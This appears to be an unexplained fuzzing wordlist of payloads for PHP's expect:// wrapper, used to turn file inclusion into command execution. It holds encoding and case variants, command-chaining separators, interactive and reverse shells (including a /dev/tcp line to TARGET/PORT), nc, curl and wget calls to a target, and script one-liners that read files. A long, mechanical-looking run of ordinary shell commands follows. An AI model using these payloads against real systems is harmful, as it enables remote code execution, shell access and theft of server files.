expect://COMMAND
expect://sh
expect://bash
expect://zsh
expect://ksh
expect://csh
expect://tcsh
expect://dash
expect:///bin/sh
expect:///bin/bash
expect:///bin/zsh
expect:///bin/ksh
expect:///bin/csh
expect:///bin/tcsh
expect:///bin/dash
expect://sh%20-c%20COMMAND
expect://bash%20-c%20COMMAND
expect:///bin/sh%20-c%20COMMAND
expect:///bin/bash%20-c%20COMMAND
Expect://COMMAND
EXPECT://COMMAND
eXpEcT://COMMAND
%65%78%70%65%63%74://COMMAND
expect%3A//COMMAND
expect%3a//COMMAND
expect://COMMAND%00
expect://COMMAND%0a
expect://COMMAND%0d
expect://COMMAND%20
expect://COMMAND;
expect://COMMAND&&
expect://COMMAND||
expect://COMMAND|
expect://COMMAND`
expect://COMMAND$()
expect://COMMAND${}
expect://COMMAND%3BCOMMAND
expect://COMMAND%26%26COMMAND
expect://COMMAND%7C%7CCOMMAND
expect://COMMAND%7CCOMMAND
expect://COMMAND%60COMMAND%60
expect://COMMAND%24(COMMAND)
expect://sh+-c+COMMAND
expect://bash+-c+COMMAND
expect:///bin/sh+-c+COMMAND
expect:///bin/bash+-c+COMMAND
expect://sh%20-i
expect://bash%20-i
expect:///bin/sh%20-i
expect:///bin/bash%20-i
expect://sh<&196;exec%20196<>/dev/tcp/TARGET/PORT
expect://bash%20-c%20'sh%20-i'
expect://perl%20-e%20'COMMAND'
expect://python%20-c%20'COMMAND'
expect://ruby%20-e%20'COMMAND'
expect://php%20-r%20'COMMAND'
expect://nc%20TARGET%20PORT
expect://netcat%20TARGET%20PORT
expect://telnet%20TARGET%20PORT
expect://curl%20TARGET
expect://wget%20TARGET
expect://fetch%20TARGET
expect://GET%20TARGET
expect://HEAD%20TARGET
expect://POST%20TARGET
expect://nmap%20TARGET
expect://ping%20TARGET
expect://dig%20TARGET
expect://host%20TARGET
expect://nslookup%20TARGET
expect://traceroute%20TARGET
expect://arp%20-a
expect://route
expect://netstat
expect://ss
expect://lsof
expect://fuser
expect://ps
expect://top
expect://htop
expect://kill
expect://killall
expect://pkill
expect://chmod
expect://chown
expect://chgrp
expect://chroot
expect://su
expect://sudo
expect://doas
expect://find
expect://locate
expect://which
expect://whereis
expect://file
expect://strings
expect://od
expect://hexdump
expect://xxd
expect://base64
expect://base32
expect://md5sum
expect://sha1sum
expect://sha256sum
expect://sha512sum
expect://openssl
expect://gpg
expect://ssh
expect://scp
expect://sftp
expect://rsync
expect://tar
expect://gzip
expect://gunzip
expect://bzip2
expect://bunzip2
expect://xz
expect://unxz
expect://zip
expect://unzip
expect://rar
expect://unrar
expect://7z
expect://compress
expect://uncompress
expect://ar
expect://cpio
expect://dd
expect://cp
expect://mv
expect://rm
expect://ln
expect://mkdir
expect://rmdir
expect://touch
expect://truncate
expect://split
expect://csplit
expect://tee
expect://script
expect://screen
expect://tmux
expect://expect
expect://socat
expect://ncat
expect://nc.traditional
expect://nc.openbsd
expect://awk
expect://sed
expect://grep
expect://egrep
expect://fgrep
expect://cut
expect://paste
expect://join
expect://sort
expect://uniq
expect://wc
expect://head
expect://tail
expect://more
expect://less
expect://vi
expect://vim
expect://nano
expect://emacs
expect://ed
expect://ex
expect://sed%20-n%20'p'
expect://awk%20'{print}'
expect://perl%20-ne%20'print'
expect://python%20-c%20'print(open("FILE").read())'
expect://ruby%20-e%20'puts%20File.read("FILE")'
expect://php%20-r%20'readfile("FILE");'
expect://node%20-e%20'require("fs").readFileSync("FILE","utf8")'
expect://lua%20-e%20'print(io.open("FILE"):read("*a"))'
expect://dash%20-c%20COMMAND
expect://ash%20-c%20COMMAND
expect://sh%20-c%20'exec%20COMMAND'
expect://bash%20-c%20'exec%20COMMAND'
expect:///bin/busybox%20sh
expect:///bin/rbash
expect:///bin/ksh93
expect:///usr/bin/sh
expect:///usr/bin/bash
expect:///usr/local/bin/bash
expect://env
expect://printenv
expect://export
expect://set
expect://declare
expect://typeset
expect://readonly
expect://unset
expect://eval
expect://source
expect://.
expect://exec
expect://command
expect://builtin
expect://enable
expect://type
expect://hash
expect://help
expect://man
expect://info
expect://apropos
expect://whatis
expect://alias
expect://unalias
expect://history
expect://fc
expect://jobs
expect://bg
expect://fg
expect://disown
expect://wait
expect://suspend
expect://times
expect://ulimit
expect://umask
expect://cd
expect://pwd
expect://pushd
expect://popd
expect://dirs
expect://echo
expect://printf
expect://read
expect://readarray
expect://mapfile
expect://test
expect://[
expect://[[
expect://true
expect://false
expect://:
expect://sleep
expect://usleep
expect://at
expect://batch
expect://cron
expect://crontab
expect://systemctl
expect://service
expect://chkconfig
expect://update-rc.d
expect://rc-update
expect://initctl
expect://start
expect://stop
expect://restart
expect://reload
expect://status
expect://reboot
expect://shutdown
expect://poweroff
expect://halt
expect://init
expect://telinit
expect://runlevel
expect://who
expect://w
expect://users
expect://last
expect://lastb
expect://lastlog
expect://ac
expect://uptime
expect://free
expect://df
expect://du
expect://mount
expect://umount
expect://fdisk
expect://parted
expect://mkfs
expect://fsck
expect://e2fsck
expect://tune2fs
expect://dumpe2fs
expect://resize2fs
expect://lsblk
expect://blkid
expect://findmnt
expect://swapon
expect://swapoff
expect://mkswap
expect://sync
expect://dmesg
expect://journalctl
expect://logger
expect://logrotate
expect://rsyslogd
expect://syslog-ng
